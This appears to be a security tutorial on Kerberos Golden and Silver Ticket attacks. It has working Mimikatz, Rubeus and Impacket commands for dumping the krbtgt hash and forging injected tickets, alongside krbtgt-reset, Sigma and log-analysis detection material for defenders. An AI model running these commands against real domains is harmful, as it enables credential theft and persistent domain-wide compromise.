🧠 Description

A Golden Ticket attack forges a Kerberos Ticket Granting Ticket (TGT) using the NTLM (or AES) hash of the KRBTGT account. Because the attacker sets the ticket's validity period while forging it, the result is persistent, domain-wide authentication: a legitimate TGT is bounded by the domain's maximum ticket lifetime (10 hours by default), but a forged one can be made valid for years.

Why Golden Ticket is Critical:
  • Persistence: Access lasts until KRBTGT password is rotated twice
  • Evasion: Completely bypasses normal authentication
  • Domain Dominance: Authenticate as any user to any service
  • Privilege Escalation: Forge tickets for Domain Admin or any account
  • Detection Evasion: the forged TGT is never requested from a DC, so no TGT-request (4768) or normal logon event is generated for it

Kerberos Authentication Overview:

  1. User requests TGT from AS (Authentication Service)
  2. AS returns TGT encrypted with KRBTGT hash
  3. User presents TGT to TGS (Ticket Granting Service)
  4. TGS returns service ticket for requested resource
  5. User presents service ticket to resource

In a Golden Ticket attack, the attacker bypasses the legitimate side of steps 1-3: the TGT is forged offline with the KRBTGT hash instead of being issued by the AS, and the forged TGT is then presented directly to the TGS to obtain service tickets for any resource.

⚠️ Preconditions

  • KRBTGT Hash: Must obtain the NTLM or AES hash of the KRBTGT account
  • Domain Name: FQDN of the target domain
  • User SID: SID of any account (typically Domain Admin)
  • Domain SID: SID of the domain (not user portion)

How to Get KRBTGT Hash:
  • Domain Admin access → DCSync attack
  • NTDS.dit extraction
  • LSASS memory dump on Domain Controller
  • Any method that yields the KRBTGT password hash

💣 Attack Execution

Using Mimikatz:

# Option 1: DCSync to get KRBTGT hash (requires replication rights, i.e. Domain Admin or equivalent)
mimikatz # lsadump::dcsync /domain:target.local /user:krbtgt

# Option 2: read the krbtgt secret from LSA on a Domain Controller
# (lsadump::sam only reads the local SAM hive, which never contains the krbtgt account)
mimikatz # lsadump::lsa /inject /name:krbtgt

# Create Golden Ticket (writes ticket.kirbi; /id is the user RID, /groups the PAC group RIDs)
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:krbtgt_hash_here /id:500 /groups:513,512,520,518,519

# Create with an explicit lifetime (/endin and /renewmax are in minutes; Mimikatz's default is 10 years) and inject into the current session (/ptt)
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-xxx /krbtgt:hash /startoffset:0 /endin:600 /renewmax:10080 /ptt

# Verify: the injected TGT should now authorise directory replication of an account
mimikatz # lsadump::dcsync /domain:target.local /user:Administrator

Using Rubeus:

# Create Golden Ticket (the Rubeus command is "golden"; the krbtgt key is passed as /rc4, /aes128 or /aes256)
Rubeus.exe golden /rc4:krbtgt_hash /user:Administrator /domain:target.local /sid:S-1-5-21-xxx /ptt

# Same ticket forged from the krbtgt AES256 key; an RC4 (0x17) ticket stands out on an AES-only domain
Rubeus.exe golden /aes256:krbtgt_aes256_key /user:Administrator /domain:target.local /sid:S-1-5-21-xxx /ptt

# After injection, verify the forged TGT is present in the current logon session
Rubeus.exe klist

Using Impacket:

# Forge the TGT with ticketer.py (Impacket has no goldenTicket.py; ticketer.py is the script)
# -nthash takes the krbtgt NT hash (-aesKey takes the AES key instead); -user-id is the RID
python3 ticketer.py -nthash krbtgt_hash -domain-sid S-1-5-21-xxx -domain target.local -user-id 500 Administrator

# ticketer.py writes Administrator.ccache; point the Kerberos client library at it
export KRB5CCNAME=Administrator.ccache

# Use the forged TGT from the ccache (-k -no-pass) with any Impacket tool, e.g. list the DC's shares
python3 smbclient.py -k -no-pass target.local/Administrator@dc01.target.local

💥 Impact Analysis

Capabilities Gained:
  • Impersonate Any User: Become any user including Domain Admins
  • Access Any Resource: Any file share, database, or service
  • DCSync: Replicate domain database for all credentials
  • Persistence: Access remains until password reset
  • Trust Exploitation: Forge tickets for forest trusts

Attack Chain:

  1. Gain Domain Admin access through other means
  2. Extract KRBTGT hash via DCSync
  3. Create Golden Ticket for persistence
  4. Wait for detection of initial compromise
  5. Responders disable the attacker's account and remove it from Domain Admins
  6. Golden Ticket still works - full access restored

🥈 Silver Ticket vs Golden Ticket

Aspect          | Golden Ticket                  | Silver Ticket
----------------|--------------------------------|---------------------------
Ticket Type     | TGT (Ticket Granting Ticket)   | TGS (Service Ticket)
Encrypted With  | KRBTGT hash                    | Service account hash
Scope           | Entire domain                  | Single service
Privilege       | Any user, any service          | Specific service account
Detection       | Harder to detect               | Easier to detect
Duration        | Up to 10 years                 | Service account's max

Silver Ticket Example:

# Create Silver Ticket for CIFS (file share) on server.target.local
# /target is the host FQDN and the key (/rc4) is that host's machine account NT hash, not the krbtgt hash
mimikatz # kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-xxx /target:server.target.local /service:cifs /rc4:server_machine_account_hash /ptt

# Access file share (the ticket is only valid for the cifs service on that host)
dir \\server.target.local\c$

🛡️ Mitigation

✅ Golden Ticket Defense:
  • KRBTGT Password Reset: Reset twice (48 hours apart)
  • Privileged Account Monitoring: Alert on KRBTGT access
  • Event Log Monitoring: Alert on unusual TGT activity
  • Protected Users Group: place privileged accounts in it so the DC refuses RC4 and NTLM for them
  • AES Encryption Only: force AES for all Kerberos tickets so any RC4 (0x17) ticket stands out

KRBTGT Reset Script:

# Reset KRBTGT password (run twice, 24 hours apart)
# This breaks ALL existing TGTs including any Golden Tickets
# (Set-ADAccountPassword is the cmdlet; -Server names the DC the change is written to)
$newPw = ConvertTo-SecureString -String (-join ((48..122) | Get-Random -Count 64 | ForEach-Object { [char]$_ })) -AsPlainText -Force
Set-ADAccountPassword -Identity krbtgt -Server dc01.target.local -Reset -NewPassword $newPw

# Or use Microsoft's New-KrbtgtKeys.ps1 script, which resets the key, forces replication
# to every DC and confirms convergence before the second reset

# Verify the reset: msDS-KeyVersionNumber increments and PasswordLastSet moves forward
Get-ADUser krbtgt -Server dc01.target.local -Properties msDS-KeyVersionNumber,PasswordLastSet |
  Select-Object msDS-KeyVersionNumber,PasswordLastSet

Monitoring Event ID 4768:

# Alert on suspicious TGT requests
# Caveat: a forged TGT is never requested from the DC, so the Golden Ticket itself
# produces no 4768. What 4768 can show is the surrounding activity:
# - RC4 (0x17) encryption where the domain should be using AES
# - Requests for privileged accounts from unusual source IPs
# - Accounts that never normally authenticate
# Use of the forged ticket shows up in 4769 (service ticket requests) with no matching 4768.
# 4768 does not record the ticket lifetime; that is visible only in the ticket itself (klist).

# 4768 property indices: [0]=TargetUserName [7]=TicketEncryptionType [9]=IpAddress
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768; StartTime=(Get-Date).AddDays(-1)} |
  Where-Object { [int]$_.Properties[7].Value -eq 0x17 } |   # RC4-HMAC TGTs only
  Select-Object TimeCreated,
    @{n='User';    e={$_.Properties[0].Value}},
    @{n='EncType'; e={'0x{0:x}' -f [int]$_.Properties[7].Value}},
    @{n='IP';      e={$_.Properties[9].Value}}

🔍 Detection

Event ID 4768 (TGT Request) Analysis:

  • Request from unusual source IP
  • Ticket lifetime > 10 hours
  • Start time in the past (retroactive ticket)
  • Account never authenticates normally
  • Unusual encryption type (RC4 0x17 instead of AES 0x12)

Sigma Rule:

title: Suspicious Golden Ticket Usage
id: 00000000-0000-0000-0000-000000000000   # placeholder: Sigma rule ids are UUIDs, generate one per rule
description: Service ticket requests (4769) using RC4-HMAC, the encryption type of a ticket forged from the krbtgt NTLM hash
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: '0x17'  # RC4-HMAC
  filter_machine:
    TargetUserName|endswith: '$'   # machine accounts; tune for the environment
  condition: selection and not filter_machine
fields:
  - TargetUserName
  - ServiceName
  - IpAddress
falsepositives:
  - Legacy systems that still negotiate RC4
level: critical
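As an added defender-side example (not part of the original page), the script below runs the two signals from the 4768 analysis list and the Sigma rule over a constructed CSV export of Security-log events: a 4769 for an account with no 4768 inside the maximum TGT lifetime (the AS never issued the forged TGT, so the DC never logged a 4768 for it), and RC4 tickets for privileged accounts. The CSV columns, the PRIVILEGED set and the sample events are assumptions.

```python
import csv
import io
from datetime import datetime, timedelta

# Constructed CSV export of Security-log events (not from a real system):
# TimeCreated,EventID,TargetUserName,TicketEncryptionType,IpAddress
SAMPLE_LOG = """\
TimeCreated,EventID,TargetUserName,TicketEncryptionType,IpAddress
2024-05-01T08:00:00Z,4768,alice,0x12,10.0.0.5
2024-05-01T08:01:00Z,4769,alice,0x12,10.0.0.5
2024-05-01T08:05:00Z,4769,Administrator,0x17,10.0.0.99
2024-05-01T08:06:00Z,4769,Administrator,0x17,10.0.0.99
2024-05-01T09:00:00Z,4768,bob,0x17,10.0.0.7
2024-05-01T09:02:00Z,4769,bob,0x17,10.0.0.7
"""

RC4_HMAC = 0x17
PRIVILEGED = {"administrator"}          # assumption: tune to the environment's Tier-0 accounts
DEFAULT_MAX_TGT_LIFE = timedelta(hours=10)   # domain default maximum TGT lifetime

def parse_events(text):
    """Parse the CSV export into (time, event_id, user, enc_type, ip) tuples, sorted by time."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        rows.append((datetime.strptime(r["TimeCreated"], "%Y-%m-%dT%H:%M:%SZ"),
                     int(r["EventID"]), r["TargetUserName"].lower(),
                     int(r["TicketEncryptionType"], 16), r["IpAddress"]))
    return sorted(rows)

def find_golden_ticket_indicators(text, tgt_window=DEFAULT_MAX_TGT_LIFE):
    """Return (time, reason, user, ip) alerts.
    Signal 1: a 4769 for an account with no 4768 in the preceding tgt_window. A forged TGT
              is never issued by the AS, so the DC logs no 4768 for it; only 4769s appear.
    Signal 2: an RC4 (0x17) ticket for a privileged account; tickets forged from the NTLM
              hash are RC4, which stands out once the domain is AES-only.
    Caveat: 4768 and 4769 can land on different DCs, so feed in the logs of every DC."""
    last_tgt, alerts = {}, []
    for ts, eid, user, etype, ip in parse_events(text):
        if eid == 4768:
            last_tgt[user] = ts
        elif eid == 4769 and (user not in last_tgt or ts - last_tgt[user] > tgt_window):
            alerts.append((ts, "4769 with no matching 4768", user, ip))
        if eid in (4768, 4769) and etype == RC4_HMAC and user in PRIVILEGED:
            alerts.append((ts, "RC4 ticket for privileged account", user, ip))
    return alerts

if __name__ == "__main__":
    for alert in find_golden_ticket_indicators(SAMPLE_LOG):
        print(*alert)
```

On the sample data only the Administrator 4769s fire (both signals, twice), while bob's RC4 TGT is ignored because bob is not privileged and his 4769 has a matching 4768.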